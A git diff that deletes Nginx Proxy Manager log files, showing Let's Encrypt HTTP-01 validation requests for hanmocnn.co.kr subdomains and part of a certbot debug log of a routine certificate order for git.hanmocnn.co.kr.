b/npm/data/logs/letsencrypt-requests_access.log deleted file mode 100644 index 79b0353..0000000 --- a/npm/data/logs/letsencrypt-requests_access.log +++ /dev/null @@ -1,21 +0,0 @@ -[14/Feb/2026:22:37:03 +0000] 200 - GET http www.hanmocnn.co.kr "/.well-known/acme-challenge/wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo" [Client 23.178.112.212] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[14/Feb/2026:22:37:04 +0000] 200 - GET http www.hanmocnn.co.kr "/.well-known/acme-challenge/wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo" [Client 18.222.135.176] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[14/Feb/2026:22:37:04 +0000] 200 - GET http www.hanmocnn.co.kr "/.well-known/acme-challenge/wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo" [Client 13.215.201.135] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[14/Feb/2026:22:37:04 +0000] 200 - GET http www.hanmocnn.co.kr "/.well-known/acme-challenge/wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo" [Client 56.228.19.145] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[14/Feb/2026:22:37:05 +0000] 200 - GET http www.hanmocnn.co.kr "/.well-known/acme-challenge/wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo" [Client 54.218.246.213] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[14/Feb/2026:22:59:04 +0000] 200 - GET http asset.hanmocnn.co.kr "/.well-known/acme-challenge/_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs" [Client 23.178.112.108] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[14/Feb/2026:22:59:05 +0000] 200 - GET http asset.hanmocnn.co.kr "/.well-known/acme-challenge/_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs" [Client 13.229.225.246] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[14/Feb/2026:22:59:06 +0000] 200 - GET http asset.hanmocnn.co.kr "/.well-known/acme-challenge/_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs" [Client 44.249.164.249] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[14/Feb/2026:22:59:06 +0000] 200 - GET http asset.hanmocnn.co.kr "/.well-known/acme-challenge/_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs" [Client 13.51.200.205] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[14/Feb/2026:22:59:07 +0000] 200 - GET http asset.hanmocnn.co.kr "/.well-known/acme-challenge/_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs" [Client 18.222.8.98] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[14/Feb/2026:23:36:13 +0000] 200 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" [Client 23.178.112.211] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[14/Feb/2026:23:36:15 +0000] 200 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" [Client 18.222.30.235] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[14/Feb/2026:23:36:16 +0000] 200 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" [Client 18.138.231.223] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[14/Feb/2026:23:36:16 +0000] 200 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" [Client 44.249.164.249] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[14/Feb/2026:23:36:17 +0000] 200 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" [Client 13.48.49.154] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[15/Feb/2026:01:51:53 +0000] 200 - GET http git.hanmocnn.co.kr "/.well-known/acme-challenge/lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0" [Client 23.178.112.107] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[15/Feb/2026:01:51:54 +0000] 200 - GET http git.hanmocnn.co.kr "/.well-known/acme-challenge/lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0" [Client 47.129.179.70] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[15/Feb/2026:01:51:54 +0000] 200 - GET http git.hanmocnn.co.kr "/.well-known/acme-challenge/lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0" [Client 13.61.182.40] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[15/Feb/2026:01:51:54 +0000] 200 - GET http git.hanmocnn.co.kr "/.well-known/acme-challenge/lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0" [Client 34.211.230.189] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[15/Feb/2026:01:51:55 +0000] 200 - GET http git.hanmocnn.co.kr "/.well-known/acme-challenge/lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0" [Client 18.218.54.218] [Length 87] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[15/Feb/2026:01:52:03 +0000] 404 - HEAD http git.hanmocnn.co.kr "/" [Client 192.64.113.146] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0" "-" diff --git a/npm/data/logs/letsencrypt-requests_error.log b/npm/data/logs/letsencrypt-requests_error.log deleted file mode 100644 index e69de29..0000000 diff --git a/npm/data/logs/letsencrypt.log b/npm/data/logs/letsencrypt.log deleted file mode 100644 index b6e56ae..0000000 --- a/npm/data/logs/letsencrypt.log +++ /dev/null @@ -1,409 +0,0 @@ -2026-02-15 01:53:21,924:DEBUG:certbot._internal.main:certbot version: 5.3.0 -2026-02-15 01:53:21,925:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot -2026-02-15 01:53:21,925:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-7', '--agree-tos', '--authenticator', 'webroot', '-m', 'windpacer@hanmocnn.co.kr', '--preferred-challenges', 'http', '--domains', 'git.hanmocnn.co.kr'] -2026-02-15 01:53:21,925:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot) -2026-02-15 01:53:21,939:DEBUG:certbot._internal.log:Root logging level set at 30 -2026-02-15 01:53:21,940:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None -2026-02-15 01:53:21,940:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot -Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported). -Interfaces: Authenticator, Plugin -Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins') -Initialized: -Prep: True -2026-02-15 01:53:21,941:DEBUG:certbot._internal.plugins.selection:Selected authenticator and installer None -2026-02-15 01:53:21,941:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None -2026-02-15 01:53:22,173:DEBUG:certbot._internal.main:Picked account: -2026-02-15 01:53:22,174:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory. -2026-02-15 01:53:22,177:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443 -2026-02-15 01:53:22,749:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033 -2026-02-15 01:53:22,750:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sun, 15 Feb 2026 01:53:22 GMT -Content-Type: application/json -Content-Length: 1033 -Connection: keep-alive -Cache-Control: public, max-age=0, no-cache -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change", - "meta": { - "caaIdentities": [ - "letsencrypt.org" - ], - "profiles": { - "classic": "https://letsencrypt.org/docs/profiles#classic", - "shortlived": "https://letsencrypt.org/docs/profiles#shortlived", - "tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient", - "tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver" - }, - "termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf", - "website": "https://letsencrypt.org" - }, - "newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct", - "newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce", - "newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order", - "qw5aGjGdqUs": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417", - "renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info", - "revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert" -} -2026-02-15 01:53:22,751:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for git.hanmocnn.co.kr -2026-02-15 01:53:22,755:DEBUG:acme.client:Requesting fresh nonce -2026-02-15 01:53:22,756:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce. -2026-02-15 01:53:22,931:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0 -2026-02-15 01:53:22,931:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sun, 15 Feb 2026 01:53:22 GMT -Connection: keep-alive -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: qLPTsdtf371F2dHjmpzxyQJyT53Irn_ns9AHyC1ZS59P7cma1yM -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - - -2026-02-15 01:53:22,932:DEBUG:acme.client:Storing nonce: qLPTsdtf371F2dHjmpzxyQJyT53Irn_ns9AHyC1ZS59P7cma1yM -2026-02-15 01:53:22,932:DEBUG:acme.client:JWS payload: -b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "git.hanmocnn.co.kr"\n }\n ]\n}' -2026-02-15 01:53:22,938:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZjM3MUYyZEhqbXB6eHlRSnlUNTNJcm5fbnM5QUh5QzFaUzU5UDdjbWExeU0iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9", - "signature": "WyHKdWrWbQ3LclhqvkOiUGsvL-CRTBoVdK5ZhXGtBeDbrprDu_5gAF-rZmoTaxKICx7JLIJmM6x5eGmUqtQPRkz-pdGzbKVYOH8tNRZmS_UlP4Xme44N2b8XsV1LfEREEi4gE7Xoltvv1WZVTa5pH2OMAV0W2qivo_rw2pvjJcAUBvbJ-LjWw8bwWgZA-V9D8y1QCNnnnygWv7MzYlqyqQdFdoFtLR_jULsyPkLr0_O1VYQ63kfGQvlu7LcIx6CigQytrQe6xjCQMfagSFHTbCUomU95CAsGkKCGG8zdcY5gxAGq9aUtCDh1ckj1i7JlxT7VG8Gw94Fm1-3xyoIvVg", - "payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogImdpdC5oYW5tb2Nubi5jby5rciIKICAgIH0KICBdCn0" -} -2026-02-15 01:53:23,207:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 350 -2026-02-15 01:53:23,208:DEBUG:acme.client:Received response: -HTTP 201 -Server: nginx -Date: Sun, 15 Feb 2026 01:53:23 GMT -Content-Type: application/json -Content-Length: 350 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480409206716 -Replay-Nonce: QkEzerAfewKqCm7D8TxtCV9igelQqU_6LxnLw93BuTLlqGVqyto -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "status": "ready", - "expires": "2026-02-22T01:53:23Z", - "identifiers": [ - { - "type": "dns", - "value": "git.hanmocnn.co.kr" - } - ], - "authorizations": [ - "https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036" - ], - "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480409206716" -} -2026-02-15 01:53:23,208:DEBUG:acme.client:Storing nonce: QkEzerAfewKqCm7D8TxtCV9igelQqU_6LxnLw93BuTLlqGVqyto -2026-02-15 01:53:23,208:DEBUG:acme.client:JWS payload: -b'' -2026-02-15 01:53:23,213:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZmV3S3FDbTdEOFR4dENWOWlnZWxRcVVfNkx4bkx3OTNCdVRMbHFHVnF5dG8iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4ODM5NDYyMDM2In0", - "signature": "aRcOzVryk7N-epoq94qMQaMnoZRc7CwSkyd9ho6LopgW7DQ9gEmTr8Wz_tImoO_K94ggGlP4u9A77STJT3qzgT7WfBRV_fbtX65jr721Gczj7p-uqUQZXgc0trtw86vR47hXaEHgiNAwcO3XfgsP_V2uTr6h3M2vDw_89Aogg7YRVJruSAIK4sOkUbAOV0JjtxMwPO8ks-tnfpJQ0w-XW-wJ7B9ipQG9h9vWDZAvK2MOgZOoqJVQjUy1_urnkpXXmE-083hikkbzsyLXXAa-P5GcW6KgHV-frj0ejgQVJMLjh6U4YmyH-7HImx7kCQD_rtQ6qQSVgC6Q4SUNBx7hGA", - "payload": "" -} -2026-02-15 01:53:23,391:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658839462036 HTTP/1.1" 200 777 -2026-02-15 01:53:23,392:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sun, 15 Feb 2026 01:53:23 GMT -Content-Type: application/json -Content-Length: 777 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: QkEzerAfRd3ApU9wqlGKFrr8ynXUod788KPNiE_LCow1T_uNR3k -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "identifier": { - "type": "dns", - "value": "git.hanmocnn.co.kr" - }, - "status": "valid", - "expires": "2026-03-17T01:51:57Z", - "challenges": [ - { - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/WBcYRQ", - "status": "valid", - "validated": "2026-02-15T01:51:51Z", - "token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0", - "validationRecord": [ - { - "url": "http://git.hanmocnn.co.kr/.well-known/acme-challenge/lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0", - "hostname": "git.hanmocnn.co.kr", - "port": "80", - "addressesResolved": [ - "222.117.41.51" - ], - "addressUsed": "222.117.41.51" - } - ] - } - ] -} -2026-02-15 01:53:23,392:DEBUG:acme.client:Storing nonce: QkEzerAfRd3ApU9wqlGKFrr8ynXUod788KPNiE_LCow1T_uNR3k -2026-02-15 01:53:23,392:DEBUG:certbot._internal.client:CSR: CSR(file=None, data=b'-----BEGIN CERTIFICATE REQUEST-----\nMIIBKTCBrwIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE7ZAcanp3QlMenYln\nHTD7y/aMNQsYPRK/GPbY52fqKJTuDETZiujJiW2ouXb36OiEHOeqiBh0CeEBas1C\n+6FetlNbP9eEZFeW4EAyUJpSyY8fzUrbz1+74Gy/NO1zCCSeoDAwLgYJKoZIhvcN\nAQkOMSEwHzAdBgNVHREEFjAUghJnaXQuaGFubW9jbm4uY28ua3IwCgYIKoZIzj0E\nAwIDaQAwZgIxAIX8GWa4RGMhJGbNLWSR+POe/0WtswWV8x3F0RAfRNUSKtajsegi\nS8p0E8O7yzY4egIxAP4lsygfSMg8agBLYJwIv1VEiPTgp/zFAbI/AZoZqarecqWW\n2FJMR0Y6bW7QwCaCTA==\n-----END CERTIFICATE REQUEST-----\n', form='pem') -2026-02-15 01:53:23,393:DEBUG:certbot._internal.client:Will poll for certificate issuance until 2026-02-15 01:54:53.393497 -2026-02-15 01:53:23,394:DEBUG:acme.client:JWS payload: -b'{\n "csr": "MIIBKTCBrwIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE7ZAcanp3QlMenYlnHTD7y_aMNQsYPRK_GPbY52fqKJTuDETZiujJiW2ouXb36OiEHOeqiBh0CeEBas1C-6FetlNbP9eEZFeW4EAyUJpSyY8fzUrbz1-74Gy_NO1zCCSeoDAwLgYJKoZIhvcNAQkOMSEwHzAdBgNVHREEFjAUghJnaXQuaGFubW9jbm4uY28ua3IwCgYIKoZIzj0EAwIDaQAwZgIxAIX8GWa4RGMhJGbNLWSR-POe_0WtswWV8x3F0RAfRNUSKtajsegiS8p0E8O7yzY4egIxAP4lsygfSMg8agBLYJwIv1VEiPTgp_zFAbI_AZoZqarecqWW2FJMR0Y6bW7QwCaCTA"\n}' -2026-02-15 01:53:23,398:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480409206716: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZlJkM0FwVTl3cWxHS0Zycjh5blhVb2Q3ODhLUE5pRV9MQ293MVRfdU5SM2siLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2ZpbmFsaXplLzMwNjQzODY5MDYvNDgwNDA5MjA2NzE2In0", - "signature": "Bi6hElJl4Oyw45hxpguXUi4m-kHZxLB2eQwSvZ_zg6ud2TTcA3XEHKrII60OeSqKdIEQi6OPJiRjkzd1ezPGXdkJLpCJ6MROCMBuuzZ_txS5Yx5uwnwLe7cX2VXZ3cf4L5HjYM_3mYt9kPO4ByiXhELIMeALK7ngR5_2y8ej-wXhYpl-lm95-ZrqV7oxVSt3Mx4uNAgG8-kP3_-WQVjGppZzzVmRWFZ3plfzut2Cp9lRNDfi_TvQkQ4NXjK0WbXJDxvti07fkwjXutpEpbYz4heqp-PaxRY09KMGbenbjj0O2vkbD_RA9Zzv0nswGLrvVmS4pe5wFiOKpur3-l1EJQ", - "payload": "ewogICJjc3IiOiAiTUlJQktUQ0Jyd0lCQURBQU1IWXdFQVlIS29aSXpqMENBUVlGSzRFRUFDSURZZ0FFN1pBY2FucDNRbE1lbllsbkhURDd5X2FNTlFzWVBSS19HUGJZNTJmcUtKVHVERVRaaXVqSmlXMm91WGIzNk9pRUhPZXFpQmgwQ2VFQmFzMUMtNkZldGxOYlA5ZUVaRmVXNEVBeVVKcFN5WThmelVyYnoxLTc0R3lfTk8xekNDU2VvREF3TGdZSktvWklodmNOQVFrT01TRXdIekFkQmdOVkhSRUVGakFVZ2hKbmFYUXVhR0Z1Ylc5amJtNHVZMjh1YTNJd0NnWUlLb1pJemowRUF3SURhUUF3WmdJeEFJWDhHV2E0UkdNaEpHYk5MV1NSLVBPZV8wV3Rzd1dWOHgzRjBSQWZSTlVTS3RhanNlZ2lTOHAwRThPN3l6WTRlZ0l4QVA0bHN5Z2ZTTWc4YWdCTFlKd0l2MVZFaVBUZ3BfekZBYklfQVpvWnFhcmVjcVdXMkZKTVIwWTZiVzdRd0NhQ1RBIgp9" -} -2026-02-15 01:53:24,814:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/finalize/3064386906/480409206716 HTTP/1.1" 200 454 -2026-02-15 01:53:24,815:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sun, 15 Feb 2026 01:53:24 GMT -Content-Type: application/json -Content-Length: 454 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480409206716 -Replay-Nonce: QkEzerAf-62VIy5uF6WKUM_0j4Ve47MTMI-BkVhP5zXT1TfCzrk -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "status": "valid", - "expires": "2026-02-22T01:53:23Z", - "identifiers": [ - { - "type": "dns", - "value": "git.hanmocnn.co.kr" - } - ], - "authorizations": [ - "https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036" - ], - "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480409206716", - "certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/063a2da28b00b2f267a3cd169337c07ad9a2" -} -2026-02-15 01:53:24,815:DEBUG:acme.client:Storing nonce: QkEzerAf-62VIy5uF6WKUM_0j4Ve47MTMI-BkVhP5zXT1TfCzrk -2026-02-15 01:53:25,816:DEBUG:acme.client:JWS payload: -b'' -2026-02-15 01:53:25,820:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480409206716: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZi02MlZJeTV1RjZXS1VNXzBqNFZlNDdNVE1JLUJrVmhQNXpYVDFUZkN6cmsiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL29yZGVyLzMwNjQzODY5MDYvNDgwNDA5MjA2NzE2In0", - "signature": "vMnBNE3IKK2s3YQ5jOEAYzwlZrq0I89Cz-8t911nhsBrHCuDTbtQuSMQayO0c3OVf4jBxJLJuEYYPYmEPZ679TcNLQTi8Fl8e2SKqaH8-CYrN29R1zgsAYE_9JbhZIQA_ereyzJqyqoQo7UFNwoDmbZmMopZoKOChHfFt8vcaShIEL_7VVZSLJ3Mfi-BuPg0Ma0plB86pstM-3T0xoc2p0c5uDPagrreaGwj0Phkt_-Lu5sLDIFXMUpnZxsFLknAW8pv6F3AsT_qA1BQgD460593TH54HbFERLM2avWrArxwf4u05wVD9MG8-9Aoi-sREAvGv5MojORDx51tDaSqxA", - "payload": "" -} -2026-02-15 01:53:25,999:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/order/3064386906/480409206716 HTTP/1.1" 200 454 -2026-02-15 01:53:26,000:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sun, 15 Feb 2026 01:53:25 GMT -Content-Type: application/json -Content-Length: 454 -Connection: keep-alive -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480409206716 -Replay-Nonce: qLPTsdtf7nABj_xfpx_vC8SHnUvfzzrQZwNnFbBx2xeMVgUvgqM -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "status": "valid", - "expires": "2026-02-22T01:53:23Z", - "identifiers": [ - { - "type": "dns", - "value": "git.hanmocnn.co.kr" - } - ], - "authorizations": [ - "https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036" - ], - "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480409206716", - "certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/063a2da28b00b2f267a3cd169337c07ad9a2" -} -2026-02-15 01:53:26,000:DEBUG:acme.client:Storing nonce: qLPTsdtf7nABj_xfpx_vC8SHnUvfzzrQZwNnFbBx2xeMVgUvgqM -2026-02-15 01:53:26,000:DEBUG:acme.client:JWS payload: -b'' -2026-02-15 01:53:26,005:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/063a2da28b00b2f267a3cd169337c07ad9a2: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZjduQUJqX3hmcHhfdkM4U0huVXZmenpyUVp3Tm5GYkJ4MnhlTVZnVXZncU0iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDYzYTJkYTI4YjAwYjJmMjY3YTNjZDE2OTMzN2MwN2FkOWEyIn0", - "signature": "i8RhvsB81LlMh7nm_ItJXK5fXbZr8YsqP7SDnbEa30hEmK5g0n0-f7hDhua2Qv4MY80fAcQYVJpwT9YGiuVv_iDVrUY68BpwalRci79vAC0jBXaJb1sN4IOpc6fTgQnJqGX04YZqRvgcg8k5W4J31FoGqcNi8kQapst_XpZ1ylAcVDNhJD4klSlRyA2CAf43WO7Ra8V92iSoUBBMokysa83OnglG6NO6KnWTgmu9IxmnCZkQceBmsIj7U3tKdgOLxllgARu2GKgRtTOoGmDouzUeMTRXr9L_pMA5ZzT_WhknVTsOZ7Wp5dSes-o0t_z5rSF16MKfZDFM1VT-9sAlsQ", - "payload": "" -} -2026-02-15 01:53:26,183:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/063a2da28b00b2f267a3cd169337c07ad9a2 HTTP/1.1" 200 2885 -2026-02-15 01:53:26,184:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sun, 15 Feb 2026 01:53:26 GMT -Content-Type: application/pem-certificate-chain -Content-Length: 2885 -Connection: keep-alive -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index", ;rel="alternate" -Replay-Nonce: qLPTsdtffEZaTjSpANFtAGOp0QEYnQLfiuY8-tbgnSfxKI78uV0 -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - ------BEGIN CERTIFICATE----- -MIIDoTCCAymgAwIBAgISBjotoosAsvJno80WkzfAetmiMAoGCCqGSM49BAMDMDIx -CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF -ODAeFw0yNjAyMTUwMDU0NTRaFw0yNjA1MTYwMDU0NTNaMB0xGzAZBgNVBAMTEmdp -dC5oYW5tb2Nubi5jby5rcjB2MBAGByqGSM49AgEGBSuBBAAiA2IABO2QHGp6d0JT -Hp2JZx0w+8v2jDULGD0Svxj22Odn6iiU7gxE2YroyYltqLl29+johBznqogYdAnh -AWrNQvuhXrZTWz/XhGRXluBAMlCaUsmPH81K289fu+BsvzTtcwgknqOCAhUwggIR -MA4GA1UdDwEB/wQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDATAMBgNVHRMBAf8E -AjAAMB0GA1UdDgQWBBQjXg5iaIl+VaOsKFNBDYMgWCIYbDAfBgNVHSMEGDAWgBSP 